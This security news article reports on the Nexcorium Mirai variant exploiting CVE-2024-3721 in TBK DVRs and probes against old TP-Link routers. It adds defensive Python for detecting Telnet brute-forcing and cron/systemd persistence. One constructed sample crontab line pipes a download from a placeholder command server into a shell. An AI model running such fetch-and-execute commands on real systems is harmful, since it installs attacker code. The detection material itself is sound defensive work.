Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Attacks
Recent findings from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 reveal that threat actors are actively exploiting vulnerabilities in TBK DVR devices and end-of-life (EoL) TP-Link Wi-Fi routers. The activity is being used to deploy Mirai botnet variants, in particular a new one named Nexcorium, on compromised devices. The campaigns underline how unpatched and unsupported Internet of Things (IoT) devices remain a persistent target for botnet operators.
Understanding the Vulnerability
The attack specifically targets TBK DVR devices by exploiting a command injection vulnerability identified as CVE-2024-3721, which has a CVSS score of 6.3. This medium-severity vulnerability affects TBK DVR-4104 and DVR-4216 models, enabling attackers to deliver the Nexcorium variant of the Mirai botnet. Security researcher Vincent Li emphasizes that IoT devices are increasingly becoming prime targets for large-scale attacks due to their widespread use, inadequate patching, and often weak security configurations.
Li states, “Threat actors continue exploiting known vulnerabilities to gain initial access and deploy malware that can persist, spread, and cause distributed denial-of-service (DDoS) attacks.”
Historical Context of the Vulnerability
This is not the first instance of CVE-2024-3721 being exploited. Over the past year, it has been leveraged to deploy various Mirai variants and a newer botnet known as RondoDox. In September 2025, CloudSEK disclosed a large-scale loader-as-a-service botnet that distributed RondoDox, Mirai, and Morte payloads through weak credentials and outdated vulnerabilities in routers, IoT devices, and enterprise applications.
Exploitation of CVE-2024-3721 drops a downloader script that fetches and launches the botnet payload built for the CPU architecture of the compromised Linux system. Once executed, the malware displays a message indicating that “nexuscorp has taken control.”
Technical Details of the Nexcorium Botnet
Nexcorium shares architectural similarities with previous Mirai variants, including XOR-encoded configuration table initialization, a watchdog module, and a DDoS attack module. The malware also exploits CVE-2017-17215 to target Huawei HG532 devices within the network. It incorporates a list of hard-coded usernames and passwords to facilitate brute-force attacks via Telnet connections.
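The Telnet credential brute-forcing described above leaves a characteristic footprint in a device's login logs: many failures from one source in a short span, cycling through a handful of vendor-style usernames. The sliding-window detector below is an added example written for this article, not code from Fortinet or from the malware analysis. The log line format (ISO timestamp, host, program, message) and the sample lines are constructed for the demo, and the threshold of five failures per 60 seconds is an assumed tuning value; adapt FAIL_RE to the wording of the real login daemon on the device.

```python
"""Sliding-window detector for Telnet password guessing against an IoT device.
Constructed example: the log format and sample lines below are made up for
the demo and are not taken from a real device or a real infection."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Optional, Set, Tuple

# Timestamp at the start of each constructed log line.
TS_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})")
# Failed-login message: several common phrasings, then username and source IP.
FAIL_RE = re.compile(
    r"(?:invalid password|login failed|authentication failure)"
    r".*?\bfor '(?P<user>[^']+)'"
    r".*?\bfrom '(?P<src>\d{1,3}(?:\.\d{1,3}){3})'",
    re.IGNORECASE,
)


def parse_failure(line: str) -> Optional[Tuple[datetime, str, str]]:
    """Return (timestamp, username, source IP) for a failed-login line, else None."""
    ts_m = TS_RE.match(line)
    fail_m = FAIL_RE.search(line)
    if not ts_m or not fail_m:
        return None
    return datetime.fromisoformat(ts_m.group("ts")), fail_m.group("user"), fail_m.group("src")


def detect_bruteforce(lines: List[str], threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> Dict[str, dict]:
    """Alert on each source the first time it reaches `threshold` failures inside `window`.

    Lines are expected in chronological order (as read from a log file).
    The alert records the window size when the threshold was crossed and every
    username the source had tried up to that point; later failures from an
    already-alerted source do not generate a second alert."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    users: Dict[str, Set[str]] = defaultdict(set)
    alerts: Dict[str, dict] = {}
    for line in lines:
        parsed = parse_failure(line)
        if parsed is None:
            continue  # successes and unrelated lines are ignored
        ts, user, src = parsed
        q = recent[src]
        q.append(ts)
        users[src].add(user)
        while q and ts - q[0] > window:
            q.popleft()  # drop failures that fell out of the window
        if len(q) >= threshold and src not in alerts:
            alerts[src] = {
                "first_alert": ts.isoformat(),
                "attempts_in_window": len(q),
                "usernames_tried": sorted(users[src]),
            }
    return alerts


# Constructed sample: one source cycling vendor-style accounts, one operator typo,
# one successful login that must not be counted.
SAMPLE_LOG = [
    "2025-10-02T08:15:01 dvr login[311]: invalid password for 'root' on 'pts/0' from '198.51.100.7'",
    "2025-10-02T08:15:03 dvr login[312]: invalid password for 'admin' on 'pts/0' from '198.51.100.7'",
    "2025-10-02T08:15:04 dvr login[313]: invalid password for 'default' on 'pts/0' from '198.51.100.7'",
    "2025-10-02T08:15:06 dvr login[314]: invalid password for 'root' on 'pts/0' from '198.51.100.7'",
    "2025-10-02T08:15:07 dvr login[315]: invalid password for 'support' on 'pts/0' from '198.51.100.7'",
    "2025-10-02T08:15:09 dvr login[316]: invalid password for 'root' on 'pts/0' from '198.51.100.7'",
    "2025-10-02T08:20:10 dvr login[320]: invalid password for 'admin' on 'pts/1' from '203.0.113.9'",
    "2025-10-02T08:20:25 dvr login[321]: root login on 'pts/1' from '203.0.113.9'",
]

if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {src}: {info['attempts_in_window']} failures by {info['first_alert']}, "
              f"usernames tried: {', '.join(info['usernames_tried'])}")
```

The window is evaluated per source rather than globally so that a single operator mistyping a password does not trip the alert, while a scanner walking a credential list does; on a real deployment, feed the function from the device's syslog export and forward alerts to whatever blocks the source at the network edge.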
If successful, the malware attempts to obtain a shell, establishes persistence through a crontab entry and a systemd service, and connects to an external server to await commands for launching DDoS attacks over various protocols, including UDP, TCP, and SMTP. Once persistence is in place, the malware deletes the originally downloaded binary to hinder detection and analysis.
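The persistence and self-deletion behaviour just described can be audited from the host side: cron entries and systemd units that launch something from a world-writable directory or pipe a download into a shell, and running processes whose on-disk binary has been unlinked (Linux reports these as a `/proc/<pid>/exe` link ending in ` (deleted)`). The script below is an added example for this article, not code from Fortinet or from the malware; the heuristics are assumptions about what a dropper's entries look like, and the sample crontab, unit file and `/proc` snapshot are constructed for the demo.

```python
"""Host-side audit for cron/systemd persistence and unlinked running binaries.
Constructed example: the sample crontab, unit file and /proc snapshot are made
up for the demo and are not artefacts from a real infection."""
import os
import re
from typing import Dict, List, Optional

# Assumed heuristics typical of IoT bot droppers. Order matters: the first match wins.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(wget|curl|tftp)\b.*\|\s*(sh|bash)\b"), "download piped into a shell"),
    (re.compile(r"^@reboot\b"), "@reboot trigger"),
    (re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/"), "runs from a world-writable directory"),
    (re.compile(r"\bchmod\s+(\+x|[0-7]?7[0-7]{2})\b"), "marks a file executable"),
]


def _classify(entry: str) -> Optional[str]:
    """Return the reason for the first matching heuristic, or None if the entry looks benign."""
    for pattern, reason in SUSPICIOUS_PATTERNS:
        if pattern.search(entry):
            return reason
    return None


def audit_crontab(text: str) -> List[Dict[str, object]]:
    """Flag crontab lines (output of crontab -l, /etc/crontab, /var/spool/cron/*)."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reason = _classify(entry)
        if reason:
            findings.append({"line": lineno, "reason": reason, "entry": entry})
    return findings


def audit_systemd_unit(name: str, text: str) -> List[Dict[str, str]]:
    """Flag Exec* directives (ExecStart, ExecStartPre, ...) of a unit file."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep or not key.strip().startswith("Exec"):
            continue
        reason = _classify(value.strip())
        if reason:
            findings.append({"unit": name, "reason": reason, "entry": value.strip()})
    return findings


def find_deleted_executables(proc_exe_links: Dict[int, str]) -> List[int]:
    """Return PIDs whose executable was unlinked after launch.

    Linux appends ' (deleted)' to readlink('/proc/<pid>/exe') once the file is
    gone, which is the footprint a bot leaves when it removes its own dropped binary."""
    return sorted(pid for pid, target in proc_exe_links.items()
                  if target.endswith(" (deleted)"))


def snapshot_proc_exe_links() -> Dict[int, str]:
    """Live collector for a real Linux host (root is needed to read other users' links)."""
    links: Dict[int, str] = {}
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            try:
                links[int(entry)] = os.readlink(f"/proc/{entry}/exe")
            except OSError:
                continue  # kernel threads and already-exited processes have no exe link
    return links


# Constructed samples (not real artefacts); c2.invalid is a reserved, non-resolving name.
SAMPLE_CRONTAB = """\
# constructed sample crontab
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
@reboot /tmp/.x/bot.arm7
*/5 * * * * wget -q http://c2.invalid/dl.sh -O- | sh
"""

SAMPLE_UNIT = """\
[Unit]
Description=System Update Service
[Service]
ExecStart=/dev/shm/.s/bot.mips
Restart=always
[Install]
WantedBy=multi-user.target
"""

SAMPLE_PROC = {1: "/sbin/init", 2314: "/tmp/.x/bot.arm7 (deleted)", 2400: "/usr/sbin/sshd"}

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {f['line']}: {f['reason']}: {f['entry']}")
    for f in audit_systemd_unit("sysupdate.service", SAMPLE_UNIT):
        print(f"{f['unit']}: {f['reason']}: {f['entry']}")
    print("processes with unlinked binaries:", find_deleted_executables(SAMPLE_PROC))
```

On a live host, replace the samples with the real crontab output, the unit files under `/etc/systemd/system`, and `snapshot_proc_exe_links()`; a deleted-binary hit combined with a flagged cron or unit entry is a strong indicator of the self-cleaning persistence pattern the article describes.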
Fortinet notes, “The Nexcorium malware displays typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to sustain long-term access to infected systems.” The use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, underscores its adaptability and effectiveness in broadening its infection reach.
Ongoing Threats and Security Measures
Unit 42 has also reported active, automated scans and probes attempting to exploit CVE-2023-33538, another command injection vulnerability impacting EoL TP-Link wireless routers. Although these attempts have been flawed and unsuccessful, they confirm the existence of real vulnerabilities that can be exploited. This particular vulnerability was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) catalog in June 2025 and affects several TP-Link models, including TL-WR940N v2 and v4, TL-WR740N v1 and v2, and TL-WR841N v8 and v10.
Researchers Asher Davila, Malav Vyas, and Chris Navarrete assert, “Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real.” Successful exploitation requires authentication to the router’s web interface, which makes credential hygiene on these devices the decisive control.
Recommendations for Users
Given that the affected TP-Link devices are no longer actively supported, users are strongly advised to replace them with newer models and to ensure that default credentials are not in use. The persistent risk of default credentials in IoT devices continues to shape the security landscape, as these credentials can turn a limited, authenticated vulnerability into a critical entry point for determined attackers.
Unit 42 emphasizes, “For the foreseeable future, the security landscape will continue to be shaped by the persistent risk of default credentials in IoT devices.”
As the cybersecurity landscape evolves, organizations and individuals must remain vigilant and proactive in addressing vulnerabilities in IoT devices. The Nexcorium variant’s exploitation of CVE-2024-3721 serves as a stark reminder of the ongoing challenges in securing interconnected devices.
For further insights, refer to the original reporting source: thehackernews.com.